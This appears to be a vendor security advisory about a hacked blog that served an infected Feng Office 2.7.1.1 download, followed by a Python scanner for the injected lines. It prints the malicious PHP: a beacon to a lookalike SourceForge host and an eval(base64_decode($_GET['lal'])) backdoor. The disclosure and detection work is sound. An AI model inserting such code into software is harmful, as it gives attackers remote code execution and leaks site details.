
Community Edition: please update your installation to the latest version. Version 2.7.1.1 could be infected

20 November, 2014 | June 14th, 2024

A few weeks ago our blog was hacked with one concrete purpose: to modify the download link for what was the latest released version.

This resulted in some users downloading an infected copy of Feng Office version 2.7.1.1.

Affected installations

The modified link changed the download destination to a local file placed on our site: an infected copy of version 2.7.1.1 of the Community Edition.

Installations running a different version, or a 2.7.1.1 downloaded from SourceForge, are not affected.

Recommended Measures

The most effective way to be 100% sure is to download and update to the latest version.

The attack

The infected version was uploaded, and a fake download link was put on our website, making use of an exploit on our blog engine (WordPress).

We have since removed all infected files from our website and corrected the Apache settings that allowed the exploit.

The infection was introduced in the files “init.php” and “environment/environment.php”, on line 22. The infected code looks like this:

In init.php:

file_get_contents('http://sourceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));

In environment.php:

if(!ini_get('session.auto_start') || (strtolower(ini_get('session.auto_start')) == 'off')) {
  if ( !isset($_GET['avoid_session']) || (isset($_GET['avoid_session']) && !$_GET['avoid_session']) ){
    session_start(); // Start the session
  }
}
file_get_contents('http://sourrceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
include_once ENVIRONMENT_PATH . '/classes/Env.class.php';
...
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));
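To check an existing installation for the two injected statements shown above, the following scanner is an added example, not Feng Office code. The function names and the `--all` option are assumptions of this example, and the patterns are deliberately a little broader than the quoted lines (any host in front of `raport.php?site=`, any request superglobal passed to `eval(base64_decode(...))`).

```python
import re
import sys
from pathlib import Path

# Files the post names as modified, relative to the install root.
NAMED_FILES = ("init.php", "environment/environment.php")

# Patterns derived from the two injected statements quoted in the post.
INDICATORS = {
    "beacon": re.compile(
        r"file_get_contents\s*\(\s*['\"]https?://[^'\"]*raport\.php\?site="),
    "backdoor": re.compile(
        r"eval\s*\(\s*base64_decode\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"),
}


def scan_file(path):
    """Return [(line_number, indicator_name, stripped_line)] for one PHP file."""
    hits = []
    text = path.read_text(encoding="utf-8", errors="replace")
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((number, name, line.strip()))
    return hits


def scan_install(root, all_php=False):
    """Scan the named files (or every .php file) under root."""
    root = Path(root)
    targets = sorted(root.rglob("*.php")) if all_php else [root / r for r in NAMED_FILES]
    findings = {}
    for path in targets:
        if path.is_file():
            hits = scan_file(path)
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings


if __name__ == "__main__":
    # Usage: python scan.py [install-root] [--all]; defaults to the current directory.
    args = [a for a in sys.argv[1:] if a != "--all"]
    results = scan_install(args[0] if args else ".", all_php="--all" in sys.argv[1:])
    for rel, hits in results.items():
        for number, name, line in hits:
            print(f"{rel}:{number}: {name}: {line[:100]}")
    sys.exit(1 if results else 0)
```

A clean result only means these two statements are absent. The backdoor allowed arbitrary code to be run on the server, so updating to the latest version remains the recommended measure.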

We would like to thank the two users who detected the issue and reported it to our team.

We should have been quicker to process the reports and to issue this post. Please accept our apologies for not being faster to publish this information, especially if your installation was affected.

Hopefully, we will handle it better if a similar attack happens again.